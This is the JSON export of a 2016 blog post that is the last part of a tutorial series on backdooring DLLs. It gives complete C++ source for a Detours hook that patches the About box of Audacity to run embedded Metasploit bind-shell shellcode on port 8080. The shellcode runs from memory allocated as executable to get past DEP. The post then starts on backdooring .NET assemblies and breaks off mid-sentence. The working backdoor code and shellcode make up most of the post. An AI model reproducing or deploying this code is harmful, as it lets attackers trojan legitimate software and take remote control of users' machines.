{"id":1351,"date":"2016-09-10T19:27:10","date_gmt":"2016-09-10T19:27:10","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=1351"},"modified":"2016-09-10T19:27:10","modified_gmt":"2016-09-10T19:27:10","slug":"backdooring-a-dll-part-4","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2016\/09\/backdooring-a-dll-part-4\/","title":{"rendered":"Backdooring a DLL part 4"},"content":{"rendered":"

Here we are finally at the last part of my series on backdooring dll files. I wanted to cover again detours as a means of backdooring dll files and executables. A fellow 2600 member I spoke to asked me the other day about what it would take to modify an exe without changing it on disk. For that I say detours! That’s what I’m going to do this in example, on top of popping a message box up, I’m also going to pop a shell.<\/p>\n

Recall that we covered this once before<\/a>. All I’m doing is slightly modifying the detours code from before to include some shellcode from MSF. I also modified the launcher slightly because of a unicode conversion error. I’ll link all projects source and all towards the end. We’re of course modifying our detours project to allow for shellcode to be implanted. Sure we *could* do our own shellcode right there in the dll with inline assembly, but MSF does a better job than me. <\/p>\n

<\/p>\n

\n
#include "stdafx.h"<\/span>\r\n#include <windows.h><\/span>\r\n#include <detours.h><\/span>\r\n#pragma comment(lib, "detours.lib")<\/span>\r\n\r\ntypedef<\/span> int<\/span> (WINAPI *<\/span>pFunc)(int<\/span>, int<\/span>);\r\nint<\/span> WINAPI MyFunc<\/span>(int<\/span>, int<\/span>);\r\npFunc FuncToDetour =<\/span> (pFunc)(0x40C910<\/span>); \/\/ address of about box in Audacity<\/span>\r\n\r\nint<\/span> WINAPI MyFunc<\/span>(int<\/span> a, int<\/span> b)\r\n{\r\n\tMessageBox(NULL<\/span>, L"Audacity rocks!"<\/span>, L"Joe was here"<\/span>, MB_OK);\r\n\t\/*<\/span>\r\n\tmsf payload(shell_bind_tcp) > generate -t c<\/span>\r\n\r\n\t* windows\/shell_bind_tcp - 328 bytes<\/span>\r\n\t* http:\/\/www.metasploit.com<\/span>\r\n\t* VERBOSE=false, LPORT=8080, RHOST=0.0.0.0,<\/span>\r\n\t* PrependMigrate=false, EXITFUNC=none, InitialAutoRunScript=,<\/span>\r\n\t* AutoRunScript=<\/span>\r\n\t*\/<\/span>\r\n\tunsigned<\/span> char<\/span> buf[] =<\/span>\r\n\t\t"<\/span>\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\\x50\\x30<\/span>"<\/span>\r\n\t\t"<\/span>\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff<\/span>"<\/span>\r\n\t\t"<\/span>\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf2\\x52<\/span>"<\/span>\r\n\t\t"<\/span>\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1<\/span>"<\/span>\r\n\t\t"<\/span>\\x51\\x8b\\x59\\x20\\x01\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b<\/span>"<\/span>\r\n\t\t"<\/span>\\x01\\xd6\\x31\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03<\/span>"<\/span>\r\n\t\t"<\/span>\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b<\/span>"<\/span>\r\n\t\t"<\/span>\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24<\/span>"<\/span>\r\n\t\t"<\/span>\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\\x5f\\x5a\\x8b\\x12\\xeb<\/span>"<\/span>\r\n\t\t"<\/span>\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c<\/span>"<\/span>\r\n\t\t"<\/span>\\x77\\x26\\x07\\xff\\xd5\\xb8\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68<\/span>"<\/span>\r\n\t\t"<\/span>\\x29\\x80\\x6b\\x00\\xff\\xd5\\x6a\\x08\\x59\\x50\\xe2\\xfd\\x40\\x50\\x40<\/span>"<\/span>\r\n\t\t"<\/span>\\x50\\x68\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x68\\x02\\x00\\x1f\\x90\\x89<\/span>"<\/span>\r\n\t\t"<\/span>\\xe6\\x6a\\x10\\x56\\x57\\x68\\xc2\\xdb\\x37\\x67\\xff\\xd5\\x57\\x68\\xb7<\/span>"<\/span>\r\n\t\t"<\/span>\\xe9\\x38\\xff\\xff\\xd5\\x57\\x68\\x74\\xec\\x3b\\xe1\\xff\\xd5\\x57\\x97<\/span>"<\/span>\r\n\t\t"<\/span>\\x68\\x75\\x6e\\x4d\\x61\\xff\\xd5\\x68\\x63\\x6d\\x64\\x00\\x89\\xe3\\x57<\/span>"<\/span>\r\n\t\t"<\/span>\\x57\\x57\\x31\\xf6\\x6a\\x12\\x59\\x56\\xe2\\xfd\\x66\\xc7\\x44\\x24\\x3c<\/span>"<\/span>\r\n\t\t"<\/span>\\x01\\x01\\x8d\\x44\\x24\\x10\\xc6\\x00\\x44\\x54\\x50\\x56\\x56\\x56\\x46<\/span>"<\/span>\r\n\t\t"<\/span>\\x56\\x4e\\x56\\x56\\x53\\x56\\x68\\x79\\xcc\\x3f\\x86\\xff\\xd5\\x89\\xe0<\/span>"<\/span>\r\n\t\t"<\/span>\\x4e\\x56\\x46\\xff\\x30\\x68\\x08\\x87\\x1d\\x60\\xff\\xd5\\xbb\\xaa\\xc5<\/span>"<\/span>\r\n\t\t"<\/span>\\xe2\\x5d\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\\x80\\xfb<\/span>"<\/span>\r\n\t\t"<\/span>\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\\xff\\xd5<\/span>"<\/span>;\r\n\r\n\t\t\/\/ this shit wont work with DEP enabled systems cuz this executes directly on the stack. <\/span>\r\n\t\t\/\/ need to alloc some memory, mark it RWE<\/span>\r\n\t\tvoid<\/span> *<\/span>exec =<\/span> VirtualAlloc(0<\/span>, sizeof<\/span> b, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\t\tmemcpy(exec, buf, sizeof<\/span> buf);\r\n\t\t((void<\/span>(*<\/span>)())exec)();\r\n\r\n\treturn<\/span> 4<\/span>;\r\n}\r\nextern<\/span> "C"<\/span> __declspec<\/span>(dllexport) void<\/span> DoNothingAlready(void<\/span>)\r\n{\r\n\tDWORD ayylmao =<\/span> 20345<\/span>;\r\n\t_asm\r\n\t{\r\n\t\txor eax, eax\r\n\t\t\txor ecx, ecx\r\n\t\t\tmov eax, ayylmao\r\n\t\t\tmov ecx, 0<\/span>\r\n\t\ttestd:<\/span>\r\n\t\tfnop\r\n\t\t\tinc ecx\r\n\t\t\tcmp eax, ecx\r\n\t\t\tjnz testd\r\n\t\t\tpop ebx\r\n\t\t\tnop\r\n\t}\r\n\treturn<\/span>;\r\n}\r\n\r\nBOOL WINAPI DllMain(HINSTANCE hinst, DWORD dwReason, LPVOID reserved)\r\n{\r\n\tif<\/span> (DetourIsHelperProcess()) {\r\n\t\treturn<\/span> TRUE;\r\n\t}\r\n\r\n\tif<\/span> (dwReason ==<\/span> DLL_PROCESS_ATTACH) {\r\n\t\tDetourRestoreAfterWith();\r\n\t\tDetourTransactionBegin();\r\n\t\tDetourUpdateThread(GetCurrentThread());\r\n\t\tDetourAttach(&<\/span>(PVOID&<\/span>)FuncToDetour, MyFunc);\r\n\t\tDetourTransactionCommit();\r\n\t}\r\n\telse<\/span> if<\/span> (dwReason ==<\/span> DLL_PROCESS_DETACH) {\r\n\t\tDetourTransactionBegin();\r\n\t\tDetourUpdateThread(GetCurrentThread());\r\n\t\tDetourDetach(&<\/span>(PVOID&<\/span>)FuncToDetour, MyFunc);\r\n\t\tDetourTransactionCommit();\r\n\t}\r\n\treturn<\/span> TRUE;\r\n}\r\n<\/pre>\n<\/div>\n
You’ll notice how we don’t directly place our shellcode in the stack. This is because doing so will fail. Modern Windows employs the use of Data Execution Prevention (DEP) which prevents execution in the stack. To get around this, we allocate a chunk of memory and mark it read write execute. We’ll be doing the same thing with .net.<\/p>\n
So our code is short and sweet. Running audacity with our launcher and hitting the about box, we see audacity open port 8080.
\n\"audacity\"<\/a>
\nSure enough here’s our shell on port 8080.
\n\"audacity_3\"<\/a><\/p>\n
As an added bonus, I’m going to go over backdooring a .Net class library \/ .net executable. I will be using Red Gate Reflector<\/a> and the reflector plugin Reflexil<\/a>. Reflexil also works for IlSpy<\/a> as well if you’re cheap and like free stuff. DnSpy doesn’t work for my examples because its a piece of shit.<\/p>\n
The obvious thing that comes to mind is “joe, how in the hell are we supposed to inline shellcode for a backdoor into a managed language that doesn’t even support inline assembly?” and to that I say good point. But there’s more than one way to skin a cat. <\/p>\n
There are 2 ways to run shellcode in a C# application. The first way is to use C and inline assembly and pointers and such, then compile your code as a dll and call the dll from within your C# application. Imagine calling a dll within a dll. Inception and shit.
\n\"1265818648499\"<\/a>
\nThe other way to do it is:<\/p>\n